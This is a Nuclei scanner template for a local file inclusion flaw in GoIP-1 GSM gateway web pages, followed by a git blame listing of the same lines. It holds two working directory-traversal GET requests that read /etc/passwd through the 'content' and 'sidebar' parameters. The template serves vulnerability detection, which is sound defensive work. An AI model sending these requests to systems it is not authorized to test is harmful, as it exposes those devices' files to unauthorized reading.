nuclei-templates/http/vulnerabilities/other/goip-1-lfi.yaml

id: goip-1-lfi

info:
  name: GoIP-1 GSM - Local File Inclusion
  author: gy741
  severity: high
  description: GoIP-1 GSM is vulnerable to local file inclusion because input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
  reference:
    - https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/
    - http://www.hybertone.com/uploadfile/download/20140304125509964.pdf
    - http://en.dbltek.com/latestfirmwares.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 2
  tags: gsm,goip,lfi,iot

http:
  - method: GET
    path:
      - "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
      - "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

# digest: 490a00463044022011a44767df2de06115e8fabe43b7a2cb47e07610bc99123237ea3340aa26154a02204ead916858e913831cc8382afe755df9f87910769a019f46e92b7e0faf4e4245:922c64590222798bb761d5b6d8e72950
Create goip-1-lfi.yaml Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-02-18 12:33:17 +00:00			`id: goip-1-lfi`

			`info:`
			`name: GoIP-1 GSM - Local File Inclusion`
			`author: gy741`
			`severity: high`
Dashboard Content Enhancements (#4927) Dashboard Content Enhancements 2022-07-27 20:17:31 +00:00			`description: GoIP-1 GSM is vulnerable to local file inclusion because input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.`
Create goip-1-lfi.yaml Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-02-18 12:33:17 +00:00			`reference:`
Update goip-1-lfi.yaml 2022-02-22 06:08:07 +00:00			`- https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/`
			`- http://www.hybertone.com/uploadfile/download/20140304125509964.pdf`
			`- http://en.dbltek.com/latestfirmwares.html`
Dashboard Content Enhancements (#4927) Dashboard Content Enhancements 2022-07-27 20:17:31 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cwe-id: CWE-22`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
templateman update 2023-10-14 11:27:55 +00:00			`tags: gsm,goip,lfi,iot`
Create goip-1-lfi.yaml Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-02-18 12:33:17 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create goip-1-lfi.yaml Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-02-18 12:33:17 +00:00			`- method: GET`
			`path:`
payload fix 2022-02-25 11:58:47 +00:00			`- "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"`
			`- "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"`
Create goip-1-lfi.yaml Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-02-18 12:33:17 +00:00
			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:.*:0:0:"`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 490a00463044022011a44767df2de06115e8fabe43b7a2cb47e07610bc99123237ea3340aa26154a02204ead916858e913831cc8382afe755df9f87910769a019f46e92b7e0faf4e4245:922c64590222798bb761d5b6d8e72950`